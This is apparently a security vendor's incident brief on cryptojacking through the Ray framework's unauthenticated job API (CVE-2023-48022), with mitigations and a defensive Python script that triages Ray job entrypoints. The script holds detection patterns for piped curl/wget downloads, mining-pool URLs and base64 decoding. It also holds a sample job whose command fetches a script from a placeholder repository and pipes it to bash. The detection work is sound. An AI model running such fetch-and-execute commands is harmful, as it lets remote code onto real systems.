Executive Summary
In late 2024, malicious actors exploited an unauthenticated remote code execution vulnerability (CVE-2023-48022) in the open-source Ray AI framework, transforming exposed development environments into a globally distributed cryptojacking operation. Attackers leveraged Ray's scheduling and orchestration APIs to gain unauthorized access and deploy cryptomining payloads, particularly targeting environments with premium NVIDIA A100 GPUs. The campaign, identified by Oligo Security, unfolded in multiple phases: after initial malware delivery via GitLab infrastructure was disrupted, attackers quickly shifted to hosting on GitHub to sustain their operation. Over 200,000 exposed Ray clusters worldwide were at risk, significantly impacting cloud AI operations, startups, and research environments.
This incident marks a major evolution in threat actor adaptation: rather than exploiting traditional network vulnerabilities, adversaries weaponized trusted automation features to evade detection and maximize illicit gain. The campaign illustrates mounting risks to cloud-hosted AI workloads, the dangers of insecure API exposure, and the urgent need for stringent internal network controls to defend against cryptojacking and abuse of compute resources.
Why This Matters Now
The persistent exposure of AI and cloud orchestration environments, combined with an unpatched and widely overlooked API vulnerability, creates a lucrative and easily exploited attack surface for threat actors. As AI adoption accelerates, failure to secure development pipelines and cloud resources from lateral movement, API abuse, and cryptojacking risks operational disruption and rising infrastructure costs now more than ever.
Attack Path Analysis
Attackers exploited a publicly exposed Ray API (CVE-2023-48022) on internet-facing AI clusters, gaining remote code execution without authentication. Using Ray’s internal scheduling functions, they escalated privileges to control orchestration and compute resources. The attackers moved laterally across Ray clusters, propagating malware jobs to additional nodes and cloud regions. Persistent command and control was maintained via externally accessible dashboards and job automation, allowing remote issuance of malicious instructions. While traditional data exfiltration was not the main motivation, attackers exported cryptocurrency mining payloads and obscured activity, directing profits to external wallets. The impact consisted of hijacked compute for cryptomining, significant consumption of GPU resources, and degraded service for legitimate users.
Kill Chain Progression
Initial Compromise
Description
Attackers remotely exploited the unauthenticated Ray Job Submission API (CVE-2023-48022) on exposed cloud AI clusters, gaining initial execution access.
Related CVEs
CVE-2023-48022
CVSS 9.8
Anyscale Ray versions 2.6.3 and 2.8.0 allow remote attackers to execute arbitrary code via the job submission API due to lack of authentication.
Affected Products:
Anyscale Ray – 2.6.3, 2.8.0
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter: Python
User Execution: Malicious File
Impair Defenses: Disable or Modify Tools
Masquerading: Match Legitimate Name or Location
Resource Hijacking
Ingress Tool Transfer
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Public-Facing Application Security
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Systems Security Controls
Control ID: Article 9(2)
CISA Zero Trust Maturity Model 2.0 – Isolate Management Interfaces
Control ID: Pillar: Network & Environment / Control: Secure Administration
NIS2 Directive – Cybersecurity risk-management measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Information Technology/IT
Ray framework cryptojacking exploits exposed AI infrastructure through unpatched CVE-2023-48022, targeting premium GPU resources in cloud environments requiring enhanced egress security and anomaly detection capabilities.
Computer Software/Engineering
Open-source AI development environments face self-propagating cryptojacking attacks via Job Submission API vulnerabilities, demanding zero trust segmentation and multicloud visibility for DevOps security governance.
Higher Education/Academia
Research labs using Ray clusters are vulnerable to autonomous cryptojacking operations that steal NVIDIA A100 GPU resources, requiring Kubernetes security and threat detection to protect academic computing infrastructure.
Biotechnology/Greentech
AI-powered biotech startups utilizing Ray framework face cryptojacking risks in cloud-hosted environments, necessitating encrypted traffic monitoring and east-west traffic security for research data protection compliance.
Sources
- Hackers turn open-source AI framework into global cryptojacking operation: https://cyberscoop.com/ray-ai-cryptojacking-vulnerability-exposed-clusters-attack-oligo-security/ (Verified)
- CVE-2023-48022 Impact, Exploitability, and Mitigation Steps | Wiz: https://www.wiz.io/vulnerability-database/cve/cve-2023-48022 (Verified)
- Two-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign - SecurityWeek: https://www.securityweek.com/two-year-old-ray-ai-framework-flaw-exploited-in-ongoing-campaign/ (Verified)
- NVD - CVE-2023-48022: https://nvd.nist.gov/vuln/detail/CVE-2023-48022 (Verified)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
CNSF controls such as Zero Trust Segmentation, east-west traffic enforcement, egress filtering, and real-time anomaly detection would have constrained adversary movement and reduced attacker dwell time. Distributing policy and inspecting internal flows would have either blocked, detected, or limited the cryptojacking campaign’s propagation and outbound mining activity.
Control: Zero Trust Segmentation
Mitigation: Prevents unauthorized public network access to sensitive workloads.
Control: Kubernetes Security (AKF)
Mitigation: Limits unauthorized task execution and narrows privilege scope.
Control: East-West Traffic Security
Mitigation: Blocks malicious internal lateral propagation.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Detects and intervenes on anomalous C2 behaviors.
Control: Egress Security & Policy Enforcement
Mitigation: Blocks or alerts on unauthorized outbound mining and data transfer.
Rapid detection and automated incident response limit attacker resource consumption.
Impact at a Glance
Affected Business Functions
- AI Model Training
- Data Processing
- Research and Development
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive credentials, including OpenAI tokens, Stripe tokens, Hugging Face tokens, Slack tokens, production database credentials, and SSH keys.
Recommended Actions
Key Takeaways & Next Steps
- Immediately restrict sensitive APIs and orchestration dashboards to trusted internal networks using zero trust segmentation.
- Deploy east-west microsegmentation to block unauthorized lateral network movements within cloud clusters.
- Enforce strict egress controls and outbound policy enforcement to prevent cryptojacking traffic from reaching miner pools.
- Integrate distributed real-time detection for anomalous task scheduling, runtime abuse, and resource spikes.
- Regularly audit cloud workload exposures and apply centralized visibility tools to discover and remediate misconfigurations.
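One way to start on the "anomalous task scheduling" item is to triage the entrypoint commands of jobs a cluster has accepted. The following is an added example, not code from this page or from the Ray project: the record fields (`submission_id`, `status`, `entrypoint`) are modeled on a Ray job listing as an assumption, the sample records are constructed, and the rules and weights are illustrative heuristics rather than indicators from the campaign.

```python
import json
import re

# Heuristic rules as (name, weight, pattern). Illustrative assumptions only.
RULES = [
    ("fetch-piped-to-interpreter", 3,
     re.compile(r"\b(curl|wget)\b[^;&]*\|\s*(sh|bash|python3?)\b")),
    ("mining-pool-protocol", 3, re.compile(r"stratum\+(tcp|ssl)://", re.I)),
    ("encoded-command", 2, re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("fetch-from-code-hosting", 1,
     re.compile(r"https?://[^\s'\"]*\b(gitlab|github|githubusercontent)\.com/", re.I)),
]
ALERT_THRESHOLD = 3  # a code-hosting URL alone (weight 1) stays below this


def score_job(job):
    """Return (score, rule_names) for one job record's entrypoint command."""
    entry = job.get("entrypoint") or ""
    hits = [(name, weight) for name, weight, rx in RULES if rx.search(entry)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def triage(jobs_json):
    """Return alerts for jobs at or above the threshold, highest score first."""
    alerts = []
    for job in json.loads(jobs_json):
        score, rules = score_job(job)
        if score >= ALERT_THRESHOLD:
            alerts.append({"submission_id": job.get("submission_id"),
                           "score": score, "rules": rules})
    return sorted(alerts, key=lambda a: -a["score"])


# Constructed sample records; hosts and repository paths are placeholders.
SAMPLE_JOBS = json.dumps([
    {"submission_id": "raysubmit_constructed01", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 10"},
    {"submission_id": "raysubmit_constructed02", "status": "RUNNING",
     "entrypoint": "pip install git+https://github.com/example-org/example-lib"
                   " && python eval.py"},
    {"submission_id": "raysubmit_constructed03", "status": "RUNNING",
     "entrypoint": "curl -s https://gitlab.com/example-user/example-repo"
                   "/-/raw/main/run.sh | bash"},
])

if __name__ == "__main__":
    for alert in triage(SAMPLE_JOBS):
        print(alert)
```

The weighting keeps ordinary dependency installs from code-hosting sites below the alert threshold while still surfacing download-and-execute entrypoints; tune the rules against a baseline of the cluster's legitimate jobs before alerting on them.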



